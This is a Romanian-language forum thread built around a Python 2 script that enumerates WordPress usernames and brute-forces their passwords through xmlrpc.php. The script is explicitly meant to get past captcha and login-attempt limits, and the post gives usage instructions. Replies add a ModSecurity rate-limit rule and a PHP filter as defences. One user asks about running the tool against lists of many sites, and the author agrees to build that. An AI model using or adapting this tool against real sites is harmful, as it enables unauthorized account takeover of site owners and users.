xmlrpc wordpress bruteforce

[dancezar]

import urllib2
import Queue
import threading,sys

useri=[]
passwd=[]
url=""
work=0
stiva=Queue.Queue()
stiva_us=Queue.Queue()
def login(domain,user,passs):

	xml_post="<methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value><string>"+str(user)+"</string></value></param><param><value><string>"+str(passs)+"</string></value></param></params></methodCall>"
	re=urllib2.Request(domain,xml_post)
	try:
		ur=urllib2.urlopen(re)
		html=ur.read()
		if "Incorrect username" in html:
			return 0
		elif "isAdmin" in html:
			return 1
		elif "requested method " in html:
			print "[+] Modulul wp.getUsersBlogs e blocat!"
			exit()
		else:
			print "[!] unknow response"
			exit()
	except urllib2.URLError,e:
		print "[!] Erroare HTTP "+e.code()
		exit()
def enum(j):
	global work,stiva,url,useri
	while work==1:
		try:
			i=stiva.get(False)
			try:
				r=urllib2.Request(url+"?author="+str(i))
				u=urllib2.urlopen(r)
				redirect=u.geturl()
				if "/author/" in redirect:
						splited=redirect.split("/author/")
						us=splited[1].replace("/","")
						if us not in useri:
							useri.append(us)
							print us
			except urllib2.URLError,e:
				a=1
			if stiva.empty():
				return 0
		except Queue.Empty:
			pass
		else:
			stiva.task_done()

def brute(j):
	global bad,stiva_us,url,work
	while work==1:
		try:
			creds=stiva_us.get(False)
			rez=login(url,creds[0],creds[1])
			print str(creds[0])+" "+str(creds[1])
			if rez==1:
					print "[+] Got him ^~^ :"+str(creds[0])+" "+str(creds[1])
					work=0
		except Queue.Empty:
			pass
		else:
			stiva_us.task_done()

url=sys.argv[1]
passwd=open(sys.argv[3]).read().splitlines()
th=[]
th_br=[]
work=1
for i in range(4):
	t=threading.Thread(target=enum,args=(1,))
	th.append(t)
	t.start()
for i in range(12):
	stiva.put(i)
for i in th:
	i.join()
if len(useri)>0:
	print "[+] Am terminat de enumerat useri:"+str(len(useri))
	print "[+] Incep bruteforce"
else:
	print "[-] Nu s-au gasit useri voi incerca cu lista de useri"
	users=open(sys.argv[2]).read().splitlines()
	for user in users:
		useri.append(user)
	print "[+] Incep bruteforce"
print "[+] Testez daca exista xmlrpc.php"
r=urllib2.Request(url+"/xmlrpc.php")
try:
	ur=urllib2.urlopen(r)
except urllib2.URLError,e:
	print "[!] "+e.code()+" xmlrpc nu exista!"
	exit()
work=1
url+="/xmlrpc.php"
for us in useri:
	for p in passwd:
		stiva_us.put((us,p))
for t in range(int(sys.argv[4])):
	thr=threading.Thread(target=brute,args=(1,))
	th_br.append(thr)
	thr.start()
for t_j in th_br:
	t_j.join()
print "[+] EXIT!"

import urllib2 import Queue import threading,sys useri=[] passwd=[] url=" - Pastebin.com

Aveam nevoie de un bruteforcer pt wordpress care sa treaca de protectii precum capcha sau restrictie prin incercari repetate,mi-am amintit de un articol unde prezenta acest concent si m-am apucat sa fac un bruteforcer in python (nu sunt foarte talentat la python m-am apucat doar de 3 luni).Mai intai v-a incerca sa enumere useri ( aici mai trebuie lucrat nu scoate din titlu ci doar din redirect) , iar apoi v-a face bruteforce.

python wp_brute.py site.com userlist.txt passlist.txt NR_THREADS

Userlist.txt este necesar atunci cand nu a reusit sa enumere useri.

Eu l-am incercat pe 2 site-uri la care am stiut deja parola si pe localhost si a mers.

Edited October 18, 2014 by danyweb09

[gogusan]

SecRule<br /> REQUEST_LINE "POST .*xmlrpc.*"<br /> "pass,initcol:ip=%{REMOTE_ADDR},setvar:ip.maxlimit=+1,deprecatevar:ip.maxlimit=1/600,nolog.....

etc.

ups

[dancezar]

SecRule<br /> REQUEST_LINE "POST .*xmlrpc.*"<br /> "pass,initcol:ip=%{REMOTE_ADDR},setvar:ip.maxlimit=+1,deprecatevar:ip.maxlimit=1/600,nolog.....

etc.

ups

Inteleg ca maxim 600 de requesturi POST pentru xmlrpc , e cam deajuns ca sa faci un bruteforce rapid , singura metoda sigura sa eviti asta e:

<?php

add_filter( 'xmlrpc_methods', 'Remove_Unneeded_XMLRPC' );

function Remove_Unneeded_XMLRPC( $methods ) {
    unset( $methods['wp.getUsersBlogs'] );
    return $methods;
}

?>

[badboy17]

Pot in loc de site.com sa adaug o lista de site-uri? Gen site.txt ?

[dancezar]

hmmm interesant am sa il fac maine sa mearga si asa...

L-a incercat cineva asa cu un single target?